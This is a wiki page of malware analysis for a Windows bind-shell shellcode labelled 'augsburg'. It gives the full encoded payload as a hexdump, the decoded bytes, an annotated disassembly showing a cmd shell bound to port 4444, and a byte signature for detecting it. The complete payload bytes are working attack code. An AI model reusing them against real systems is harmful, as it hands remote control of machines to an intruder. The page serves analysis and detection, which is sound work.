[[csni:shellcodes:augsburg]]
 
Trace: home » csni » shellcodes » augsburg
Table of Contents

augsburg Shellcode

file csni:shellcodes:augsburg:augsburg.bin

Shellcode

raw

hexdump 

00000000  eb 03 59 eb 05 e8 f8 ff  ff ff 4f 49 49 49 49 49  |ë.Yë.èøÿÿÿOIIIII|
00000010  49 51 5a 56 54 58 36 33  30 56 58 34 41 30 42 36  |IQZVTX630VX4A0B6|
00000020  48 48 30 42 33 30 42 43  56 58 32 42 44 42 48 34  |HH0B30BCVX2BDBH4|
00000030  41 32 41 44 30 41 44 54  42 44 51 42 30 41 44 41  |A2AD0ADTBDQB0ADA|
00000040  56 58 34 5a 38 42 44 4a  4f 4d 4e 4f 4c 36 4b 4e  |VX4Z8BDJOMNOL6KN|
00000050  4d 54 4a 4e 49 4f 4f 4f  4f 4f 4f 4f 42 36 4b 58  |MTJNIOOOOOOOB6KX|
00000060  4e 36 46 32 46 42 4b 38  45 34 4e 53 4b 48 4e 47  |N6F2FBK8E4NSKHNG|
00000070  45 30 4a 47 41 50 4f 4e  4b 48 4f 34 4a 31 4b 48  |E0JGAPONKHO4J1KH|
00000080  4f 45 42 32 41 50 4b 4e  49 44 4b 38 46 43 4b 48  |OEB2APKNIDK8FCKH|
00000090  41 50 50 4e 41 33 42 4c  49 39 4e 4a 46 48 42 4c  |APPNA3BLI9NJFHBL|
000000a0  46 37 47 30 41 4c 4c 4c  4d 50 41 50 44 4c 4b 4e  |F7G0ALLLMPAPDLKN|
000000b0  46 4f 4b 43 46 55 46 42  4a 32 45 37 45 4e 4b 58  |FOKCFUFBJ2E7ENKX|
000000c0  4f 55 46 52 41 50 4b 4e  48 56 4b 38 4e 50 4b 44  |OUFRAPKNHVK8NPKD|
000000d0  4b 58 4f 45 4e 41 41 30  4b 4e 43 50 4e 52 4b 58  |KXOENAA0KNCPNRKX|
000000e0  49 38 4e 46 46 42 4e 41  41 56 43 4c 41 43 4b 4d  |I8NFFBNAAVCLACKM|
000000f0  46 36 4b 58 43 44 42 43  4b 58 42 54 4e 50 4b 48  |F6KXCDBCKXBTNPKH|
00000100  42 47 4e 31 4d 4a 4b 48  42 34 4a 30 50 55 4a 46  |BGN1MJKHB4J0PUJF|
00000110  50 58 50 34 50 30 4e 4e  42 45 4f 4f 48 4d 48 56  |PXP4P0NNBEOOHMHV|
00000120  43 45 48 36 4a 36 43 33  44 33 4a 46 47 47 43 47  |CEH6J6C3D3JFGGCG|
00000130  44 33 4f 35 46 55 4f 4f  42 4d 4a 46 4b 4c 4d 4e  |D3O5FUOOBMJFKLMN|
00000140  4e 4f 4b 33 42 55 4f 4f  48 4d 4f 35 49 38 45 4e  |NOK3BUOOHMO5I8EN|
00000150  48 56 41 48 4d 4e 4a 30  44 30 45 35 4c 56 44 30  |HVAHMNJ0D0E5LVD0|
00000160  4f 4f 42 4d 4a 46 49 4d  49 30 45 4f 4d 4a 47 55  |OOBMJFIMI0EOMJGU|
00000170  4f 4f 48 4d 43 55 43 45  43 55 43 45 43 35 43 54  |OOHMCUCECUCEC5CT|
00000180  43 55 43 34 43 45 4f 4f  42 4d 48 36 4a 56 41 31  |CUC4CEOOBMH6JVA1|
00000190  4e 45 48 56 43 55 49 38  41 4e 45 59 4a 56 46 4a  |NEHVCUI8ANEYJVFJ|
000001a0  4c 41 42 57 47 4c 47 35  4f 4f 48 4d 4c 36 42 41  |LABWGLG5OOHML6BA|
000001b0  41 45 45 35 4f 4f 42 4d  4a 56 46 4a 4d 4a 50 52  |AEE5OOBMJVFJMJPR|
000001c0  49 4e 47 35 4f 4f 48 4d  43 35 45 55 4f 4f 42 4d  |ING5OOHMC5EUOOBM|
000001d0  4a 56 45 4e 49 44 48 58  49 44 47 55 4f 4f 48 4d  |JVENIDHXIDGUOOHM|
000001e0  42 55 46 55 46 45 45 35  4f 4f 42 4d 43 39 4a 36  |BUFUFEE5OOBMC9J6|
000001f0  47 4e 49 57 48 4c 49 37  47 55 4f 4f 48 4d 45 45  |GNIWHLI7GUOOHMEE|
00000200  4f 4f 42 4d 48 36 4c 36  46 56 48 36 4a 36 43 36  |OOBMH6L6FVH6J6C6|
00000210  4d 56 49 58 45 4e 4c 46  42 55 49 35 49 52 4e 4c  |MVIXENLFBUI5IRNL|
00000220  49 48 47 4e 4c 36 46 44  49 48 44 4e 41 53 42 4c  |IHGNL6FDIHDNASBL|
00000230  43 4f 4c 4a 50 4f 44 34  4d 42 50 4f 44 54 4e 32  |COLJPOD4MBPODTN2|
00000240  43 49 4d 58 4c 47 4a 53  4b 4a 4b 4a 4b 4a 4a 46  |CIMXLGJSKJKJKJJF|
00000250  44 47 50 4f 43 4b 48 41  4f 4f 45 47 46 54 4f 4f  |DGPOCKHAOOEGFTOO|
00000260  48 4d 4b 35 47 55 44 55  41 45 41 35 41 45 4c 46  |HMK5GUDUAEA5AELF|
00000270  41 30 41 45 41 35 45 45  41 35 4f 4f 42 4d 4a 56  |A0AEA5EEA5OOBMJV|
00000280  4d 4a 49 4d 45 30 50 4c  43 45 4f 4f 48 4d 4c 56  |MJIME0PLCEOOHMLV|
00000290  4f 4f 4f 4f 47 53 4f 4f  42 4d 4b 48 47 45 4e 4f  |OOOOGSOOBMKHGENO|
000002a0  43 48 46 4c 46 36 4f 4f  48 4d 44 55 4f 4f 42 4d  |CHFLF6OOHMDUOOBM|
000002b0  4a 56 42 4f 4c 38 46 50  4f 35 43 55 4f 4f 48 4d  |JVBOL8FPO5CUOOHM|
000002c0  4f 4f 42 4d 5a 00                                 |OOBMZ.|
000002c6

unxor'd 

00000000  fc 6a eb 4d e8 f9 ff ff  ff 60 8b 6c 24 24 8b 45  |üjëMèùÿÿÿ`.l$$.E|
00000010  3c 8b 7c 05 78 01 ef 8b  4f 18 8b 5f 20 01 eb 49  |<.|.x.ï.O.._ .ëI|
00000020  8b 34 8b 01 ee 31 c0 99  ac 84 c0 74 07 c1 ca 0d  |.4..î1À.¬.Àt.ÁÊ.|
00000030  01 c2 eb f4 3b 54 24 28  75 e5 8b 5f 24 01 eb 66  |.Âëô;T$(uå._$.ëf|
00000040  8b 0c 4b 8b 5f 1c 01 eb  03 2c 8b 89 6c 24 1c 61  |..K._..ë.,..l$.a|
00000050  c3 31 db 64 8b 43 30 8b  40 0c 8b 70 1c ad 8b 40  |Ã1Ûd.C0.@..p.­.@|
00000060  08 5e 68 8e 4e 0e ec 50  ff d6 66 53 66 68 33 32  |.^h.N.ìPÿÖfSfh32|
00000070  68 77 73 32 5f 54 ff d0  68 cb ed fc 3b 50 ff d6  |hws2_TÿÐhËíü;PÿÖ|
00000080  5f 89 e5 66 81 ed 08 02  55 6a 02 ff d0 68 d9 09  |_.åf.í..Uj.ÿÐhÙ.|
00000090  f5 ad 57 ff d6 53 53 53  53 53 43 53 43 53 ff d0  |õ­WÿÖSSSSSCSCSÿÐ|
000000a0  66 68 11 5c 66 53 89 e1  95 68 a4 1a 70 c7 57 ff  |fh.\fS.á.h€.pÇWÿ|
000000b0  d6 6a 10 51 55 ff d0 68  a4 ad 2e e9 57 ff d6 53  |Öj.QUÿÐh€­.éWÿÖS|
000000c0  55 ff d0 68 e5 49 86 49  57 ff d6 50 54 54 55 ff  |UÿÐhåI.IWÿÖPTTUÿ|
000000d0  d0 93 68 e7 79 c6 79 57  ff d6 55 ff d0 66 6a 64  |Ð.hçyÆyWÿÖUÿÐfjd|
000000e0  66 68 63 6d 89 e5 6a 50  59 29 cc 89 e7 6a 44 89  |fhcm.åjPY)Ì.çjD.|
000000f0  e2 31 c0 f3 aa fe 42 2d  fe 42 2c 93 8d 7a 38 ab  |â1ÀóªþB-þB,..z8«|
00000100  ab ab 68 72 fe b3 16 ff  75 44 ff d6 5b 57 52 51  |««hrþ³.ÿuDÿÖ[WRQ|
00000110  51 51 6a 01 51 51 55 51  ff d0 68 ad d9 05 ce 53  |QQj.QQUQÿÐh­Ù.ÎS|
00000120  ff d6 6a ff ff 37 ff d0  8b 57 fc 83 c4 64 ff d6  |ÿÖjÿÿ7ÿÐ.Wü.ÄdÿÖ|
00000130  52 ff d0 68 f0 8a 04 5f  53 ff d6 ff d0 90 90 90  |RÿÐhð.._SÿÖÿÐ...|

Analysis

XOR decoder

Metasploit PexAlphaNumeric

unxor'd shellcode 

00421A31   FC               CLD
00421A32   6A EB            PUSH -15
00421A34   4D               DEC EBP
00421A35   E8 F9FFFFFF      CALL leimbach.00421A33
00421A3A   60               PUSHAD
00421A3B   8B6C24 24        MOV EBP,DWORD PTR SS:[ESP+24]
00421A3F   8B45 3C          MOV EAX,DWORD PTR SS:[EBP+3C]
00421A42   8B7C05 78        MOV EDI,DWORD PTR SS:[EBP+EAX+78]
00421A46   01EF             ADD EDI,EBP
00421A48   8B4F 18          MOV ECX,DWORD PTR DS:[EDI+18]
00421A4B   8B5F 20          MOV EBX,DWORD PTR DS:[EDI+20]
00421A4E   01EB             ADD EBX,EBP
00421A50   49               DEC ECX
00421A51   8B348B           MOV ESI,DWORD PTR DS:[EBX+ECX*4]
00421A54   01EE             ADD ESI,EBP
00421A56   31C0             XOR EAX,EAX
00421A58   99               CDQ
00421A59   AC               LODS BYTE PTR DS:[ESI]
00421A5A   84C0             TEST AL,AL
00421A5C   74 07            JE SHORT leimbach.00421A65
00421A5E   C1CA 0D          ROR EDX,0D
00421A61   01C2             ADD EDX,EAX
00421A63  ^EB F4            JMP SHORT leimbach.00421A59
00421A65   3B5424 28        CMP EDX,DWORD PTR SS:[ESP+28]
00421A69  ^75 E5            JNZ SHORT leimbach.00421A50
00421A6B   8B5F 24          MOV EBX,DWORD PTR DS:[EDI+24]
00421A6E   01EB             ADD EBX,EBP
00421A70   66:8B0C4B        MOV CX,WORD PTR DS:[EBX+ECX*2]
00421A74   8B5F 1C          MOV EBX,DWORD PTR DS:[EDI+1C]
00421A77   01EB             ADD EBX,EBP
00421A79   032C8B           ADD EBP,DWORD PTR DS:[EBX+ECX*4]
00421A7C   896C24 1C        MOV DWORD PTR SS:[ESP+1C],EBP
00421A80   61               POPAD
00421A81   C3               RETN
00421A82   31DB             XOR EBX,EBX
00421A84   64:8B43 30       MOV EAX,DWORD PTR FS:[EBX+30]
00421A88   8B40 0C          MOV EAX,DWORD PTR DS:[EAX+C]
00421A8B   8B70 1C          MOV ESI,DWORD PTR DS:[EAX+1C]
00421A8E   AD               LODS DWORD PTR DS:[ESI]
00421A8F   8B40 08          MOV EAX,DWORD PTR DS:[EAX+8]
00421A92   5E               POP ESI
00421A93   68 8E4E0EEC      PUSH EC0E4E8E
00421A98   50               PUSH EAX
00421A99   FFD6             CALL ESI
00421A9B   66:53            PUSH BX
00421A9D   66:68 3332       PUSH 3233
00421AA1   68 7773325F      PUSH 5F327377
00421AA6   54               PUSH ESP
00421AA7   FFD0             CALL EAX                                 ; call LoadLibraryA
00421AA9   68 CBEDFC3B      PUSH 3BFCEDCB
00421AAE   50               PUSH EAX
00421AAF   FFD6             CALL ESI
00421AB1   5F               POP EDI
00421AB2   89E5             MOV EBP,ESP
00421AB4   66:81ED 0802     SUB BP,208
00421AB9   55               PUSH EBP
00421ABA   6A 02            PUSH 2
00421ABC   FFD0             CALL EAX
00421ABE   68 D909F5AD      PUSH ADF509D9
00421AC3   57               PUSH EDI
00421AC4   FFD6             CALL ESI
00421AC6   53               PUSH EBX
00421AC7   53               PUSH EBX
00421AC8   53               PUSH EBX
00421AC9   53               PUSH EBX
00421ACA   53               PUSH EBX
00421ACB   43               INC EBX
00421ACC   53               PUSH EBX
00421ACD   43               INC EBX
00421ACE   53               PUSH EBX
00421ACF   FFD0             CALL EAX                                 ; call WSASocketA
00421AD1   66:68 115C       PUSH 5C11                                ; port 4444
00421AD5   66:53            PUSH BX
00421AD7   89E1             MOV ECX,ESP
00421AD9   95               XCHG EAX,EBP
00421ADA   68 A41A70C7      PUSH C7701AA4
00421ADF   57               PUSH EDI
00421AE0   FFD6             CALL ESI
00421AE2   6A 10            PUSH 10
00421AE4   51               PUSH ECX
00421AE5   55               PUSH EBP
00421AE6   FFD0             CALL EAX                                 ; call bind
00421AE8   68 A4AD2EE9      PUSH E92EADA4
00421AED   57               PUSH EDI
00421AEE   FFD6             CALL ESI
00421AF0   53               PUSH EBX
00421AF1   55               PUSH EBP
00421AF2   FFD0             CALL EAX
00421AF4   68 E5498649      PUSH 498649E5
00421AF9   57               PUSH EDI
00421AFA   FFD6             CALL ESI
00421AFC   50               PUSH EAX
00421AFD   54               PUSH ESP
00421AFE   54               PUSH ESP
00421AFF   55               PUSH EBP
00421B00   FFD0             CALL EAX                                 ; call accept
00421B02   93               XCHG EAX,EBX
00421B03   68 E779C679      PUSH 79C679E7
00421B08   57               PUSH EDI
00421B09   FFD6             CALL ESI
00421B0B   55               PUSH EBP
00421B0C   FFD0             CALL EAX                                 ; call closesocket
00421B0E   66:6A 64         PUSH 64
00421B11   66:68 636D       PUSH 6D63
00421B15   89E5             MOV EBP,ESP
00421B17   6A 50            PUSH 50
00421B19   59               POP ECX
00421B1A   29CC             SUB ESP,ECX
00421B1C   89E7             MOV EDI,ESP
00421B1E   6A 44            PUSH 44
00421B20   89E2             MOV EDX,ESP
00421B22   31C0             XOR EAX,EAX
00421B24   F3:AA            REP STOS BYTE PTR ES:[EDI]
00421B26   FE42 2D          INC BYTE PTR DS:[EDX+2D]
00421B29   FE42 2C          INC BYTE PTR DS:[EDX+2C]
00421B2C   93               XCHG EAX,EBX
00421B2D   8D7A 38          LEA EDI,DWORD PTR DS:[EDX+38]
00421B30   AB               STOS DWORD PTR ES:[EDI]
00421B31   AB               STOS DWORD PTR ES:[EDI]
00421B32   AB               STOS DWORD PTR ES:[EDI]
00421B33   68 72FEB316      PUSH 16B3FE72
00421B38   FF75 44          PUSH DWORD PTR SS:[EBP+44]
00421B3B   FFD6             CALL ESI
00421B3D   5B               POP EBX
00421B3E   57               PUSH EDI
00421B3F   52               PUSH EDX
00421B40   51               PUSH ECX
00421B41   51               PUSH ECX
00421B42   51               PUSH ECX
00421B43   6A 01            PUSH 1
00421B45   51               PUSH ECX
00421B46   51               PUSH ECX
00421B47   55               PUSH EBP
00421B48   51               PUSH ECX
00421B49   FFD0             CALL EAX                                 ; call CreateProcessA
00421B4B   68 ADD905CE      PUSH CE05D9AD
00421B50   53               PUSH EBX
00421B51   FFD6             CALL ESI
00421B53   6A FF            PUSH -1
00421B55   FF37             PUSH DWORD PTR DS:[EDI]
00421B57   FFD0             CALL EAX                                 ; call WaitForSingleObject
00421B59   8B57 FC          MOV EDX,DWORD PTR DS:[EDI-4]
00421B5C   83C4 64          ADD ESP,64
00421B5F   FFD6             CALL ESI
00421B61   52               PUSH EDX
00421B62   FFD0             CALL EAX                                 ; call closesocket
00421B64   68 F08A045F      PUSH 5F048AF0
00421B69   53               PUSH EBX
00421B6A   FFD6             CALL ESI
00421B6C   FFD0             CALL EAX                                 ; call SetUnhandledExceptionFilter

shellcode patterns

bindshell 

bindshell::augsburg
{
	pattern
	"\\x6A\\xEB\\x4D\\xE8\\xF9\\xFF\\xFF\\xFF\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x7C\\x05\\x78\\x01\\xEF\\x8B\\x4F\\x18\\x8B\\x5F\\x20\\x01\\xEB\\x49\\x8B"
	"\\x34\\x8B\\x01\\xEE\\x31\\xC0\\x99\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24\\x28\\x75\\xE5\\x8B\\x5F\\x24\\x01\\xEB\\x66\\x8B"
	"\\x0C\\x4B\\x8B\\x5F\\x1C\\x01\\xEB\\x03\\x2C\\x8B\\x89\\x6C\\x24\\x1C\\x61\\xC3\\x31\\xDB\\x64\\x8B\\x43\\x30\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08"
	"\\x5E\\x68\\x8E\\x4E\\x0E\\xEC\\x50\\xFF\\xD6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\xD0\\x68\\xCB\\xED\\xFC\\x3B\\x50\\xFF\\xD6\\x5F"
	"\\x89\\xE5\\x66\\x81\\xED\\x08\\x02\\x55\\x6A\\x02\\xFF\\xD0\\x68\\xD9\\x09\\xF5\\xAD\\x57\\xFF\\xD6\\x53\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xFF\\xD0\\x66"
	"\\x68(..)\\x66\\x53\\x89\\xE1\\x95\\x68\\xA4\\x1A\\x70\\xC7\\x57\\xFF\\xD6\\x6A\\x10\\x51\\x55\\xFF\\xD0\\x68\\xA4\\xAD\\x2E\\xE9\\x57\\xFF\\xD6\\x53\\x55"
	"\\xFF\\xD0\\x68\\xE5\\x49\\x86\\x49\\x57\\xFF\\xD6\\x50\\x54\\x54\\x55\\xFF\\xD0\\x93\\x68\\xE7\\x79\\xC6\\x79\\x57\\xFF\\xD6\\x55\\xFF\\xD0\\x66\\x6A\\x64\\x66"
	"\\x68\\x63\\x6D\\x89\\xE5\\x6A\\x50\\x59\\x29\\xCC\\x89\\xE7\\x6A\\x44\\x89\\xE2\\x31\\xC0\\xF3\\xAA\\xFE\\x42\\x2D\\xFE\\x42\\x2C\\x93\\x8D\\x7A\\x38\\xAB\\xAB"
	"\\xAB\\x68\\x72\\xFE\\xB3\\x16\\xFF\\x75\\x44\\xFF\\xD6\\x5B\\x57\\x52\\x51\\x51\\x51\\x6A\\x01\\x51\\x51\\x55\\x51\\xFF\\xD0\\x68\\xAD\\xD9\\x05\\xCE\\x53\\xFF"
	"\\xD6\\x6A\\xFF\\xFF\\x37\\xFF\\xD0\\x8B\\x57\\xFC\\x83\\xC4\\x64\\xFF\\xD6\\x52\\xFF\\xD0\\x68\\xF0\\x8A\\x04\\x5F\\x53\\xFF\\xD6\\xFF\\xD0";
	mapping (none,port);
};
 
 
csni/shellcodes/augsburg.txt · Last modified: 2006/04/19 01:08
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki